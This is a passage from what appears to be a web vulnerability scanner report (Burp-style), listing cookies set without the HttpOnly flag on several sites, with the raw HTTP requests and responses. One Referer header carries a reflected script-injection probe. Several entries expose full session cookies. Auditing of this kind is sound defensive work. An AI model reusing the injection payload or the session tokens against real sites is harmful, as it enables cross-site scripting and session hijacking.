Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CkTst=G1309951137024

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19932
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:14 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1
PPServer: PPV: 30 H: BAYIDSPROF1D05 V: 0
Date: Wed, 06 Jul 2011 11:21:13 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...

10.10. http://c.microsoft.com/trans_pixel.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&ti=Microsoft%20Search%20Preferences%20Page&fi=1&fv=10.3&r=http%3A%2F%2Fburp%2Fshow%2F0&ts=1309951354314&sr=1920x1200&bs=1041x985 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://search.microsoft.com/Preference.aspx?bd498%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ef1d3c6b4585=1&mkt=en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; mcI=Thu, 09 Jun 2011 16:24:17 GMT; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; s_vnum=1311213700142%26vn%3D2; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/21/2011 12:35:21&Microsoft.VisitStartDate=06/21/2011 12:32:03&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=29&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940116672:ss=1309940093261

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7fac793-ceeb-435f-829d-6351edfd89a3&Microsoft.CreationDate=07/06/2011 11:22:37&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.NumberOfVisits=2&SessionCookie.Id=26FDF2F789E3D4343E8A3F6065EE6BF1; domain=microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.VisitStartDate=07/06/2011 11:22:37&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=31&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Thu, 05-Jul-2012 11:22:38 GMT; path=/
Set-Cookie: MS0=3382a99b723844019751e1a79738c963; domain=.microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:22:38 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

10.11. http://developers.digg.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://developers.digg.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: developers.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESS395417e620b9b9b47288b47745f54be6=98edcda430c01adc5de44ed3b21784ec; expires=Fri, 29-Jul-2011 14:54:56 GMT; path=/; domain=.developers.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 5997
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

10.12. http://jobs.digg.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://jobs.digg.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: jobs.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSb35b189ffa137f2f4ba6e0ebbe3d6f9c=e8b60e479e4f64320ce8065cb6d3ca23; expires=Fri, 29-Jul-2011 15:10:31 GMT; path=/; domain=.jobs.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:37:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

10.13. http://knowledgelayer.softlayer.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://knowledgelayer.softlayer.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: knowledgelayer.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:00 GMT
Server: Apache
Set-Cookie: PHPSESSID=f5088c0e2e03edd7fff01fa38f08d18e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Length: 38314
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!-- Start SoftLayerHeader -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>K
...[SNIP]...

10.14. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://nae.ubs.com
Path:   /awu/help/inter/en/ubsHelp.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /awu/help/inter/en/ubsHelp.htm HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:24 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1958
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_L9gle69HertpY5M1FA0n6S8Ha8hmI3x+G1EGHTEEbrittFE1; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/awu/help/inter/en/ubs
...[SNIP]...

10.15. https://nae.ubs.com/quotes  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://nae.ubs.com
Path:   /quotes

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotes HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:21 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1935
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_QnzyiVMmCmOuQc59lEBC6wIYAyv-NToCOLr+gbDJuPrkFe1I; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes">
</head>
<bod
...[SNIP]...

10.16. https://nae.ubs.com/quotes/markets_instruments  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://nae.ubs.com
Path:   /quotes/markets_instruments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quotes/markets_instruments HTTP/1.1
Host: nae.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
date: Wed, 06 Jul 2011 14:08:19 GMT
cache-control: no-cache
pragma: no-cache
content-length: 1955
connection: close
p3p: CP="NON CUR OTPi OUR NOR UNI"
Set-Cookie: PD-S-SESSION-ID=2_SX4z2ua6xceeMCGR3a5iZThqKGwm33qPdj7u-pf6nRdVUcxu; Path=/; Secure
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="refresh" content="0;url=/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch?command=UrlRequest&urlReq=/quotes/markets_instru
...[SNIP]...

10.17. http://ping.fm/ref/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ping.fm
Path:   /ref/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ref/ HTTP/1.1
Host: ping.fm
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Wed, 06 Jul 2011 11:21:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /login/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3p28cc2ebck30pasml0mp53is1; path=/
Content-Length: 0
Connection: close
Via: 1.1 AN-0016020121270012


10.18. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1183778&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w